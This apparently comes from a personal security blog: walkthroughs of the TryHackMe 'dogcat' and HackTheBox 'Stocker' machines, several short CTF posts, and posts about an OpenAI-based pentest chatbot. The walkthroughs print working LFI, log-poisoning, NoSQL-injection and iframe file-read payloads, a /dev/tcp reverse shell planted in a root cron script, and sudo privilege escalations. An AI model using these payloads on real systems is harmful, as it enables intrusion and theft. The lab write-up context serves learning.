: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.155.23:22
Open 10.10.155.23:80
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-27 22:06 UTC
Initiating Ping Scan at 22:06
Scanning 10.10.155.23 [2 ports]
Completed Ping Scan at 22:06, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:06
Completed Parallel DNS resolution of 1 host. at 22:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 22:06
Scanning 10.10.155.23 [2 ports]
Discovered open port 80/tcp on 10.10.155.23
Discovered open port 22/tcp on 10.10.155.23
Completed Connect Scan at 22:06, 0.27s elapsed (2 total ports)
Nmap scan report for 10.10.155.23
Host is up, received syn-ack (0.27s latency).
Scanned at 2023-10-27 22:06:42 UTC for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

And NMAP for good measure for details on the ports we found open, and we’ll enumerate versions while we are at it:

kali@kalia  ~/curr  nmap -sC -sV -p 22,80 $IP
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 07:08 JST
Nmap scan report for 10.10.155.23
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.20 seconds

The statement on the room seems quite evident. We should be looking at the website which is PHP and there should be some LFI.

Local File Inclusion (LFI) is when local files are passed to the incude statement of PHP in this case without being properly sanitized. So we could test this by finding pages that take filenames as parameters.

First I added dogcat.thm to my /etc/hosts file.

Next check out the website:

And the source:

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="[/style.css](view-source:http://dogcat.thm/style.css)">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="[/?view=dog](view-source:http://dogcat.thm/?view=dog)"><button id="dog">A dog</button></a> <a href="[/?view=cat](view-source:http://dogcat.thm/?view=cat)"><button id="cat">A cat</button></a><br>
            </div>
</body>

</html>

If we want to test some simple LFI, we can try to use something like:
http://dogcat.thm/?view=../../../../etc/passwd

We see:

So there’s something filtering there. We can try some simple fuzzing to see if we can bypass that filter.

I’ve tried a number of LFI fuzzing techniques and most of them are not working. It almost certainly has to include the cat or dog for button when we pass the call to the web server.

So we may be able to use base64 to use the name cat or dog when passing what we want to see:
GET /?view=php://filter/convert.base64-encode/cat/resource=index HTTP/1.1

For example:

And here is a rendered view:

So let’s take that BASE64 encoded string and put it in CyberChef:

Now we can see the unencoded index file we grabbed. The interesting parts are in the php script:

<?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>

There is a line there starting with $ext which appends a .php file extention to everything we ask for. This is why we were getting an error.

We should be able to just add that ext= to the end of our query to bypass it.

So we take the result and put it in CyberChef:

This converts the base64.

Now that we know that we can bypass their filter simply by adding the ext= to the end, we don’t need our base64 though. Let’s just go back to the browser and run it like this:
../../../../etc/cat/../passwd&ext=

The reason we include cat there is because the source code says:

if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {

So if we are saying the request includes dog OR cat to get that file.

And the source:

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="[/style.css](view-source:http://dogcat.thm/style.css)">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="[/?view=dog](view-source:http://dogcat.thm/?view=dog)"><button id="dog">A dog</button></a> <a href="[/?view=cat](view-source:http://dogcat.thm/?view=cat)"><button id="cat">A cat</button></a><br>
        Here you go!root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    </div>
</body>

</html>

Yay! It works!

If we look here, none of the accounts in /etc/passwd have a shell. (i.e. they all say nologin) I have never seen this in real life but hey 🙂

We are going to be forced to get a php reverse shell here.

So let’s see if anything we are doing is being logged to apache logs.
If we go here:
view-source:http://dogcat.thm/?view=../../../../var/log/apache2/cat/../access.log&ext=

We look at this excerpt from the log:

This tells us that our commands are getting URL encoded, so getting a php reverse shell will be more difficult. However, the User Agent, which we can control is NOT URL encoded.

Maybe we can manipulate that to pull our php-reverse-shell and run it.

So I want to get a few things ready. We need to get a copy of the php-reverse-shell.php from Pentestmonkey and then modify the IP and port then we can host it:

 kali@kalia  ~/curr/source  cp /home/kali/scripts/php-reverse-shell.php .                      
 kali@kalia  ~/curr/source  ls                      
php-reverse-shell.php
kali@kalia  ~/curr/source  mv php-reverse-shell.php shell.php  

kali@kalia  ~/curr/source  vi
# -- make changes and save
 kali@kalia  ~/curr/source  python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Then with BurpSuite we can send a new request with the modified user agent to pull our reverse shell:

GET /?view=../../../var/log/apache2/cat/../access.log&ext= HTTP/1.1
Host: dogcat.thm
User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.18.10.150/shell.php'))?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

NOTE: Be SURE your top GET request is for the log file we are trying to poison with our modified User agent or this won’t work.

Next you should see the hit on your python webserver:

python3 -m http.server 80         
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

10.10.155.23 - - [28/Oct/2023 08:36:37] "GET /shell.php HTTP/1.0" 200 -

Now the malicious shell script has been successfully pulled to Target host.

Let’s start up a reverse shell listener and then activate it by visiting the URL.
http://dogcat.thm/shell.php

 kali@kalia  ~  ~/bin/revs 4444                  
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...

NOTE: In case your wondering what revs is, I made a script that handles the reverse shell and spits out those instructions incase you forget how to stabilize the shell. Anything to save time is good. If you want a copy, check my github account.

Hit the URL:
http://dogcat.thm/shell.php

Then we can catch our shell:

 kali@kalia  ~  ~/bin/revs 4444                  
Starting reverse shell on port 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4444 ...
connect to [10.18.10.150] from (UNKNOWN) [10.10.155.23] 35322
Linux 4d8258e6405d 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 GNU/Linux
 23:37:11 up  1:33,  0 users,  load average: 0.02, 0.05, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Ok, we got our shell. Let’s look around for flags:

$ ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ pwd
/
$ cd /var/www
$ ls
flag2_QMW7JvaY2LvK.txt
html
$ cat flag2_QMW7JvaY2LvK.txt
THM{LF1_t0_RC3_aec3fb}

There is Flag #2.

Continuing:

$ cd html 
$ ls
cat.php
cats
dog.php
dogs
flag.php
index.php
php-reverse-shell.php
shell.php
style.css
$ cat flag.php
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
?>

I guess we could have specified the file ‘flag’ and gotten this first flag from the Browser. Anyway, there is Flag #1.

Privesc

From here I check sudo -l to see what permissions we have for sudo:

$ sudo -l
Matching Defaults entries for www-data on 4d8258e6405d:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 4d8258e6405d:
    (root) NOPASSWD: /usr/bin/env

Well that’s an easy privesc. You can search it on gtfobins but call it like this:

$ sudo env /bin/sh

ads
/bin/sh: 2: ads: not found
whoami
root
cd /root
ls
flag3.txt
cat flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}

Right. There is Flag #3.

Ok at this point we have root, but there is 1 more flag. I recall seeing something about Docker on the room title. Maybe something there.

The following 2 commands confirms that we are indeed in a docker container:

ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 Oct 27 22:04 /.dockerenv

hostname
4d8258e6405d

So there is a very easy way to normally escape a docker container:

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cd /mnt//bin/sh: 12: docker: not found
pwd
/bin/sh: 13: cd: can't cd to /mnt/pwd

pwd
/root

Looks like we don’t have access to the docker binary to spin up a new copy of alpine.

Let’s see if we can find docker:

find / -name docker
/etc/dpkg/dpkg.cfg.d/docker
find: '/proc/16/map_files': Permission denied
find: '/proc/17/map_files': Permission denied
find: '/proc/18/map_files': Permission denied
find: '/proc/19/map_files': Permission denied
find: '/proc/20/map_files': Permission denied
find: '/proc/63/map_files': Permission denied
find: '/proc/136/map_files': Permission denied
find: '/proc/1116/map_files': Permission denied
find: '/proc/1120/map_files': Permission denied
find: '/proc/1254/map_files': Permission denied

Hmm.. ok so maybe there’s another way to do this. Let me look around.

After a fair bit of prodding around. I found this:

find / -type f -mmin -2 |grep -v 'proc' | grep -v 'sys'
find: '/proc/16/map_files': Permission denied
find: '/proc/17/map_files': Permission denied
find: '/proc/18/map_files': Permission denied
find: '/proc/19/map_files': Permission denied
find: '/proc/20/map_files': Permission denied
find: '/proc/63/map_files': Permission denied
find: '/proc/136/map_files': Permission denied
find: '/proc/1116/map_files': Permission denied
find: '/proc/1120/map_files': Permission denied
find: '/proc/1254/map_files': Permission denied
find: '/proc/1593/task/1593/fdinfo/6': No such file or directory
find: '/proc/1593/fdinfo/5': No such file or directory
/opt/backups/backup.tar
/var/log/apache2/access.log

It looks like that /opt/backups/backup.tar is getting created every min or so.

cd /opt/backups
ls -al
total 2892
drwxr-xr-x 2 root root    4096 Apr  8  2020 .
drwxr-xr-x 1 root root    4096 Oct 27 22:04 ..
-rwxr--r-- 1 root root      69 Mar 10  2020 backup.sh
-rw-r--r-- 1 root root 2949120 Oct 28 00:14 backup.tar

There seems to be a backup script here running once a min. I’m not sure where it’s running since it’s not in the /etc/crontab and it’s also not under anything in /etc/cron.daily.

ls -al
total 2892
drwxr-xr-x 2 root root    4096 Apr  8  2020 .
drwxr-xr-x 1 root root    4096 Oct 27 22:04 ..
-rwxr--r-- 1 root root      69 Mar 10  2020 backup.sh
-rw-r--r-- 1 root root 2949120 Oct 28 00:15 backup.tar

My script searched for files updated in the last 2 mins less the standard constantly changing system files. That check shows indeed that the backup.tar file is getting created once a min. Let’s check the .sh shell script:

cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container

Ya it’s just a basic shell script running as root and since we are root we can modify it.

Let’s start another reverse shell listener on our Attacking box:

 kali@kalia  ~  ~/bin/revs 4445 
Starting reverse shell on port 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4445 ...

Now we can change that .sh script file to send us a reverse shell.
This is the file way I did it:

cp backup.sh backup.sh.old
ls
backup.sh
backup.sh.old
backup.tar
echo "#!/bin/bash" > backup.sh
echo "bash -i >& /dev/tcp/10.18.10.150/4445 0>&1" >> backup.sh
cat backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.18.10.150/4445 0>&1

Oddly I tried this without the intial echo of bash’s shebang but it wouldn’t work. I did it this way and it was fine. Notice the first > redirect there is only one. This one wipes the file and writes. The 2nd time I use a double >> which appends to the file the reverse shell.

And then we wait..

kali@kalia  ~  ~/bin/revs 4445 
Starting reverse shell on port 4445
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z - Background shell
stty raw -echo; fg
export TERM=xterm
listening on [any] 4445 ...
connect to [10.18.10.150] from (UNKNOWN) [10.10.155.23] 51844
bash: cannot set terminal process group (8817): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# 

Now we have a root shell on the machine itself.

root@dogcat:~# ls
ls
container
flag4.txt
root@dogcat:~# cat flag4.txt
cat flag4.txt
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}

Conclusion

This was a pretty easy room. I did like that idea of the log poisoning. I don’t often see that on a simple LFI room, nice touch. It made me think 🙂 I thought it was going to be easier than that.

I was also happy it wasn’t a simple docker breakout. I had to search a bit to find that backup script running. A lot of times the standard binaries (Living off the Land) on the box can help you a lot without having to rely on the PEAS scripts etc.

I had a lot of fun doing this.

Initial Difficulty: 6/10
Overall Difficulty: 5/10
Fun Level: 8/10

HackTheBox – Stocker

HackTheBox

I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerating and found no robots.txt.
There is a 302 redirect on the standard port.

Added socker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enum a little further and found that there was a vulnerability to NOSQL as found in BurpSuite.

BurpSuite Capture Login

Changing the content-type to json and putting a nosql bypass:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}
BurpSuite NoSQL Injection Testing

After forwarding the packet from BurpSuite, this gets a login becuase the express evaluates to true, and we now show items on the website. If we click on an item, add it to the cart, and then add an iframe into the captured packet to show us /etc/passwd, it will give us a list of users.

BurpSuite – Post Forward get Login

Now we Add to Basket and Checkout

Post Login Checkout Basket

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",
Embed File in an iFrame before submitting via BurpSuite

Adding the above captured _id to /api/po/ID to the site gives us the captured iframe data which is actually the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.

Now we have a possible username of angoose. Remember we are looking for a non system account and one with a shell such as /bin/bash. The others just show /bin/false or /usr/sbin/nologin so those are unusable for our purpose.

Now we can the same trick to grab the site’s index.js so we can find a password.

BurpSuite iFrame injection to get contents of index.js
After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password too IHeardPassphrasesArePrettySecure thanks to the coder hardcoding it into the script because they had not yet created any kind of dotevn environment or secrets database to store it in.

As an asside, a trick that coders will user is to obfuscate passwords to applications. That is to take a password and base64 encode it and store that in a file. Then read it from the application, run a base64 -d operation on it to show the true password and use it from a variable in the script. This keeps from storing the password in the script. One of the first things I like to do when enumerating for information/passwords is to see if I can find any base64 encoded files in the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

So I see from running sudo -l that we only have permission to run /usr/bin/node and only from /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt file and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we will run it, but I use a trick to escape the /usr/local/scripts directory by just appending ../../../home/angoose/

This puts us in the correct directory to call our script from our home while still satifisfying the requirements to run the script from /usr/local/scripts, as that is where the starting path is.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9

Review

I had some intial challenges with not being able to load the site. After that I had some instability which forced me to have to request a restart on the box after running some vulnerability against nginx.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Big Tech Job Cuts – where to go now?

Google is one of the latest companies to cut tech jobs. Some 12,000 jobs this week.

With big tech realing from some historic job losses, many tech workers maybe wondering where they should go from here.

For myself, I’ve been studying for the last 10 months or so, Cybersecurity. Like many large enterprise organisations, I’ve seen a tremendous uptick in Security related incidents. At some point I decided to turn my attention on the subject.

As I would find out some 10 months later, it’s a very good thing I did. I was one of the many hundreds of thousands that have been affected by the recent layoffs from Big Tech globally.

I’ve been doing some studying recently to see what fields are popping for the mid-term and long-term future. Here are some interesting results.

  1. Data science and analysis: With the increasing amount of data being generated, there is a growing demand for professionals who can collect, analyze, and interpret data.
  2. Cybersecurity: As technology becomes more prevalent, the need for professionals who can protect against cyber threats also increases.
  3. Cloud computing: As more companies move their operations to the cloud, there is a growing need for professionals who can design, build, and maintain cloud-based systems.
  4. Artificial intelligence and machine learning: As these technologies continue to advance, there will be a growing demand for professionals who can develop and apply AI and ML solutions to various industries.
  5. Business development and consulting: With the changing business landscape, there is a need for professionals who can help companies navigate and adapt to new technologies and market trends.
  6. Project and product management: This role involves leading cross-functional teams to deliver a product or service.

While some of these jobs maybe common sense alternatives, some might be surprising. For example, Project and product management. I think maybe for the short-term this might be important, but long term I’m not so sure.

Some of the obvious ones are AI and Cybersecurity however. I would also say that anything supporting Cloud computing is quite important. This is because so many new tools need to be made in this area to handling integration from analytics, cybersecurity and more.

If you are one of the many tech workers who has lost their jobs, I feel your pain. I put this list together to share some hope for a bright new future though. Wishing you all the best of luck as we navigate these new and uncertain times ahead.

Isis OpenAI Chatbot for Penetration Testing

It seems that I will be having some more time to work on my personal projects and also working towards my OSCP because I quit my job. I will be looking for a new gig after some needed time off, but in the meantime I’m excited to continue my studies with Penetration Testing as well as doing some coding projects that I’ve been wanting to either finish or start.

I’ve added some code to the Isis OpenAI Chatbot for Penetration Testing. This is more how I envisioned it working as a hands-free way to interact with me. There are still some quirks going on with the OpenAI that I’ve found and I will touch on these.

First, I named this project as I mentioned after the Star Trek series episode Assignment Earth’s Isis character. There was an AI that wa able to work with a character called Gary Seven to save the planet. In that light, I really added a lot of fluff to the AI code. You can tweak it to your liking. I’d also add that some of the code such as the history and training questions can and probably should be tweaked. If you re-inject those with every question, you will probably eat up tokens and money fast. So please be aware of that.

For the next things I want to do, I need to add some ability for Isis to save things like Injections, snipets and code into either files or into my working flow. To be honest when I started this project I was so shocked that Isis actually generated some totally unique reverse shell code for me in php. I had thought maybe it would look it up on the internet and post me something. It actually coded something! Interestingly I could not get the same result using the playground as the public API seems to block ‘dangerous’ code. I’m not sure how concessions would be made for legitimate penetration testers.

Isis OpenAI Chatbot for Penetration Testing is something really cool. As far as I know it was the 1st of it’s kind. This was released and within weeks, I saw other cool apps from others to follow like Github’s Copilot, which to my mind is super cool, and similar to how I envisioned Isis to begin with except I would like the choice to save code/snippets/scripts into places of my choosing.

Anyway, play around with it and see what you think. If you have any suggestions for improvements or wish to contribute, then go for it. You can find the code on my Github here:

https://github.com/c0ri/isis

Top 5 ways to protect your Active Directory from Hackers

hacker

Here are five ways to protect Active Directory from hackers:

  1. Use strong and unique passwords: It is important to use strong, unique passwords for all accounts in Active Directory, including administrator accounts. You should also enable password complexity and password expiration policies to help ensure that strong passwords are being used.
  2. Enable two-factor authentication: Two-factor authentication (2FA) requires users to provide an additional form of authentication, such as a security token or one-time code, in addition to their password. This helps to protect against password-based attacks and can significantly increase the security of your Active Directory environment.
  3. Use Group Policy Objects (GPOs) to implement security policies: GPOs can be used to enforce security policies across your Active Directory environment, such as setting password complexity requirements, disabling insecure protocols, and restricting access to certain resources.
  4. Regularly update and patch your systems: It is important to keep all systems, including your Active Directory infrastructure, up to date with the latest patches and security updates. This helps to protect against known vulnerabilities that could be exploited by hackers.
  5. Monitor and audit your Active Directory environment: Regularly monitoring and auditing your Active Directory environment can help you identify potential security issues and take appropriate action to address them. You should also consider implementing a security incident and event management (SIEM) solution to help you monitor and analyze security events in real-time.

More CTF fun with Overpass 2 – Hacked

I did a new and interesing kind of room over at Tryhackme called Overpass 2. This is a remake of an original Overpass room. Lots More CTF fun with Overpass 2 – Hacked!

Quick Review

This room involed being on a Blue team, and working from a Packet Capture to figure out what clues might have been left as to why/who/what/where this may have happened. Then you are to take that information, and use it to break back into the system and take back control of your long lost (and very sad) flags. 😉

I use Wireshark a lot at work, being in networking. I haven’t seen such blatently left breadcrumbs in all my years but it was a lot of fun doing this room.

It didn’t take long to gather all of the intial answers for the first few Tasks in this room.

I found it interesting to download the backdoor that they used, and analyse it to figure out how it worked. The backdoor was used to maintain persistence by setting up another ssh server on a separate port.

Where I did have some trouble was with technical issues with hashcat. It kept refusing to run on my vm due to how I am setup with no PCI passthrough for my graphics card. It seems like it wants to only use GPU, even though there are flags there for using CPU.

At any rate, I found a work around and was able to start the crack. I had forgotten that it was salted however, and had to do it again after figuring out the correct syntax.

The last Task of getting back in was quite easy. I just SSH’d back into the attackers’ backdoor using the their own credentials I had cracked, then I immediately found a SUID copy of bash sitting (.hidden) in their home as .suid_bash.

I just ran ./.suid_bash -p to get root and the last flag.

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root

Spoilers/Walkthrough

If you want the spoilers and need help with the room you can read my complete walkthrough here: https://github.com/c0ri/PentestingDocs/blob/main/CTFs/THM/Overpass%202%20-%20Hacked.md

Like what I do? https://www.buymeacoffee.com/c0ri

Capture The Flag – Daily Bugle

capture the flag - daily bugle

Pretty tough room today playing Capture the Flag – Daily Bugle over on Tryhackme. The room had a fun Spiderman Theme.

This room was rated HARD, but TBH I didn’t think it was that bad. I would consider it an Intermediate room. There were a few things that made it harder than usual however, so I’ll try to go over that a bit.

There were almost no notes to work from, it was more or less ‘Here is the server, hack it’. This made it quite a bit more challenging.

Another issue was scanning with SQLMap didn’t reveal anything with a normal scan, but there was a cryptic note about SQLi vulnerabilities so what else can you do but press on.

Finding the version of Joomla, the sites’ CMS, was extremely helpful because we could find a great Python scripted exploit to get in.

The rest was pretty much downhill until the very end. The exploit for yum required an RPM, but there’s no fpm for Kali.. that’s more for Redhat RPMs. But, I did find a way to do it using a ruby gem called fpm.

Bookmark this and install it, because you will need it one day I promise: https://fpm.readthedocs.io/en/v1.10.2/source/gem.html

For that matter, I suggest you install Golang, and Ruby if you haven’t already. Those are both extremely good and useful languages. If Ghandi was a programming language he would have been Ruby 😛

Anyway that was a little caveat that I’m sure has caught a few people out. You can check out my full notes for this room over on my github here:

https://github.com/c0ri/PentestingDocs/blob/main/CTFs/THM/Daily%20Bugle.md

Have some thoughts on this room? I’d love to hear your story!

Like what I do? https://www.buymeacoffee.com/c0ri

Capture the Flag – Skynet

skynet

A little more #CTF fun today on #Tryhackme as Capture the Flag – Skynet revealed some surprise.

I spent a little time today with a CTF on Tryhackme. Today’s room was titled “Skynet”. I kinda like the way the title and story these rooms. Hackers are so creative 😉

I think this room was pretty easy, but I did see some interesting development near the end where I found what appeared to be remnants of other people’s code runs trying to get root using the same technique for ‘tar’ that I was using. I wonder if anyone else has seen this or was this just extra trouble thrown in to see how we cope. I think if I had little or no experience with Linux it would have prooved a very difficult challenge.

Anyway I try to include my thought process in the notes so you can see how I try to work around caveats.

Feel free to check out my walkthrough and let me know your experience with it.

https://github.com/c0ri/PentestingDocs/blob/main/CTFs/THM/Skynet.md

While you are at it, check out my latest project for Isis. An AI powered Hacking helper.

Isis – AI chatbot to help you with Penetration Testing

I have been super busy lately. Doing graduate studies, and also working hard every day training for my OSCP exam. I have been very productive tho!

I made some new code for penetration testers that will help be a helper to find code inserts, shells, SQL injection and the like for you. AFAIK it’s the first of it’s kind and it uses some pretty decent AI from openAI.

I like to think of ‘her’ as an angel on my shoulder. Imagine you are under a tight deadline. A company gave you only 5 days to test their websites and report your findings. Then imagine talking to Isis while you work and having her pop up suggestions for reverse-shell code, SQL injection etc. WOOOOOoo!

My Initial work is promising, but stlll some kinks to work out. If you wanna contribute to the code that’d be cool too.

If you are interested in the code you can check it out here: https://github.com/c0ri/isis

Love what I do? https://www.buymeacoffee.com/c0ri